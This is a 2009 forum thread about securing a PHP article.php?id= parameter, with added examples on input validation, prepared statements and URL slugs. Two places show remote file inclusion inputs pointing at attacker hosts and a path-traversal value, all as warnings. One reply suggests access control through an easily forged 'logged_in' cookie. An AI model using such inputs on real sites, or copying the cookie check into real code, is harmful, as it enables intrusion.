Thread: php security
-
May 18, 2009, 08:48 #1
php security
I had my website URLs like www.example.com/article.php?id=14&title=today, but I saw that it's easy for hackers to change the title. So I changed it to www.example.com/article.php?id=14.
Is it secure like this, or do I have to do more work in my PHP script to avoid problems with hackers?
-
May 18, 2009, 10:10 #2
In that respect, you are safe.
But as far as client security goes in general, you may want to read this:
http://code.google.com/p/browsersec/wiki/Main
-
May 18, 2009, 10:26 #3
There isn't much more you can do to protect the PHP superglobal $_GET[''] because anyone can alter the URL. In your case it shouldn't be too big a problem because it seems you're only trying to use the id to display a page's content. If you want to restrict people from viewing "special pages" then you'd probably want to include an "if statement" on the page you're looking to restrict.
For example, if you want to let anyone view pages with id 1-5, keep the script the way you have it now. But let's say you want to restrict pages with id 5-10; then you might want to use a login application so that when someone logs in a cookie called "logged_in" is dropped. Then on pages 5-10 you use an "if statement" that might look something like this.
if (!isset($_COOKIE['logged_in'])) {
    header('Location: login.php');
    exit; // stop here, otherwise the rest of the restricted page is still sent to the browser
}
This is basic code you use at the very top of pages 5-10. It will redirect people to your login page if they're not logged in.
You could also use:
$pageID = $_GET['id'] ?? null; // null when the parameter is absent, avoiding an undefined-index notice
if (!$pageID) {
    echo 'please do not play around with the URL';
    exit; // nothing sensible to show without an id
}
This will display a nice little message if anyone tries to delete the page id.
These are just 2 simple examples, I hope this helped.
-
May 18, 2009, 11:56 #4
sorin21us, "id=14" is potentially unsafe for your server because it could allow remote file inclusion (RFI) attacks. What if someone calls the page with id=hxxp://hackersite.com/badphpscript.txt?
If you expect id to be numeric, your script should quit and do nothing if the value sent for id contains anything other than digits.
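As an added example (not code from the thread, and not sorin21us's own article.php), here is how article.php can enforce the rule from the reply above: the id must be a string of decimal digits, and the script stops otherwise. The include() pattern the reply warns about is shown only as a comment. The $db PDO connection and the articles table with id, title and body columns are assumptions.

```php
<?php
// Added example, not code from the thread. It implements the rule from post #4:
// the id must be a string of decimal digits, otherwise the script stops.
// Assumptions: $db is an existing PDO connection and there is an `articles`
// table with columns `id`, `title` and `body`.

declare(strict_types=1);

/**
 * Returns the article id as a positive int, or null when the parameter is
 * missing, not a string, or contains anything other than decimal digits.
 */
function parseArticleId(array $query): ?int
{
    if (!isset($query['id']) || !is_string($query['id'])) {
        return null;                       // absent, or id[]=... array trickery
    }
    $raw = $query['id'];
    // ctype_digit() rejects "", "-1", "+14", "14abc" and "http://..." outright;
    // the length cap keeps the later (int) cast from overflowing.
    if (!ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// The pattern post #4 warns about (shown only as a comment, never run):
//     include $_GET['id'] . '.php';
// With allow_url_include enabled, id=http://attacker.example/x.txt? fetches and
// executes remote code; even without it, id=../config or similar reads other
// local files through the same include(). A validated integer never reaches
// include() or a file path at all.

$id = parseArticleId($_GET);
if ($id === null) {
    http_response_code(400);
    exit('Invalid article id.');
}

// Hardened lookup: the integer is bound as a parameter, never concatenated
// into the SQL string, so there is no injection point either.
$stmt = $db->prepare('SELECT title, body FROM articles WHERE id = :id');
$stmt->bindValue(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$article = $stmt->fetch(PDO::FETCH_ASSOC);
if ($article === false) {
    http_response_code(404);
    exit('No such article.');
}

// Escape on output so a stored title or body cannot inject HTML or script.
echo '<h1>', htmlspecialchars($article['title'], ENT_QUOTES, 'UTF-8'), '</h1>';
echo '<div>', nl2br(htmlspecialchars($article['body'], ENT_QUOTES, 'UTF-8')), '</div>';
```

Rejecting rather than "cleaning" the value is deliberate: a request with id=14abc or id=http://... is not a typo, so a 400 with no further processing is the right answer, and the function returns null rather than 0 so that a missing id and id=0 both fail the same way.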
-
May 19, 2009, 10:27 #5
Thank you for your answers. I believe sk89q that with only the article id in the title it will be secure for now.
I wanted to make it with sessions, like royalty066 says, with a login system, but the site is about news and tutorials and I don't know whether anyone will want to read it if they have to log in.
I saw on other sites that in the title they have something like www.example.com/today-news-example.php.
Can someone tell me how to do that?
-
May 19, 2009, 11:52 #6
When you save the article, save a shrunken-down and normalized title (i.e. Today's News Example -> "todays-news-example"), and you can query your database (or file system) by that normalized title instead of an ID #. Then you could have a script that is accessed like so: article.php?slug=todays-news-example. To get the articles to have a .php extension and appear as files in a directory, you can use something called mod_rewrite (if you use Apache for your web server).
I would still keep an ID # if you are using a database though, because it's a more permanent identifier.
Although in your original post, you were referring to how you could display an article's title, not get to the article by its title.
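An added example of the slug approach described in the reply above (not code from the thread): the title is normalized once when the article is saved and stored next to the numeric id, and article.php looks the article up by slug. The $db PDO connection, the articles table, its slug column with a UNIQUE index, and the function names are assumptions.

```php
<?php
// Added example, not code from the thread. It shows the slug approach from
// post #6: normalise the title once when the article is saved, store it next
// to the numeric id, and look the article up by slug in article.php.
// Assumptions: $db is an existing PDO connection and `articles` has columns
// `id`, `slug` (with a UNIQUE index), `title` and `body`.

declare(strict_types=1);

/** "Today's News: Example!" -> "todays-news-example" */
function slugify(string $title): string
{
    $slug = strtolower($title);
    $slug = str_replace(["'", "\u{2019}"], '', $slug);      // "today's" -> "todays", not "today-s"
    $slug = preg_replace('/[^a-z0-9]+/', '-', $slug);       // every other run of characters -> one hyphen
    return trim($slug, '-');
}

/** Accept only what slugify() can produce, so garbage never reaches the query. */
function isValidSlug(string $slug): bool
{
    return strlen($slug) <= 100
        && preg_match('/^[a-z0-9]+(?:-[a-z0-9]+)*$/', $slug) === 1;
}

/**
 * On save: append -2, -3, ... until the slug is free. The UNIQUE index is the
 * real guarantee; this loop just picks a readable candidate before the INSERT.
 */
function uniqueSlug(PDO $db, string $base): string
{
    $stmt = $db->prepare('SELECT 1 FROM articles WHERE slug = :slug');
    $candidate = $base;
    for ($n = 2; ; $n++) {
        $stmt->bindValue(':slug', $candidate, PDO::PARAM_STR);
        $stmt->execute();
        if ($stmt->fetchColumn() === false) {
            return $candidate;
        }
        $candidate = $base . '-' . $n;
    }
}

// On lookup (article.php?slug=todays-news-example):
$slug = $_GET['slug'] ?? '';
if (!is_string($slug) || !isValidSlug($slug)) {
    http_response_code(404);
    exit('No such article.');
}
$stmt = $db->prepare('SELECT id, title, body FROM articles WHERE slug = :slug');
$stmt->bindValue(':slug', $slug, PDO::PARAM_STR);
$stmt->execute();
$article = $stmt->fetch(PDO::FETCH_ASSOC);
if ($article === false) {
    http_response_code(404);
    exit('No such article.');
}
echo '<h1>', htmlspecialchars($article['title'], ENT_QUOTES, 'UTF-8'), '</h1>';
```

When saving, call $slug = uniqueSlug($db, slugify($title)); before the INSERT, and if the INSERT still hits the UNIQUE index because two saves raced, retry with the next suffix. slugify() drops non-ASCII letters entirely, so a title made only of accented or non-Latin characters yields an empty slug; fall back to the numeric id in that case. For the file-like URLs the original poster saw, an Apache .htaccess with RewriteEngine On, RewriteCond %{REQUEST_FILENAME} !-f and RewriteRule ^([a-z0-9-]+)\.php$ article.php?slug=$1 [L,QSA] maps today-news-example.php onto article.php; the RewriteCond keeps real files such as article.php itself from being rewritten, and the character class matches exactly what isValidSlug() accepts.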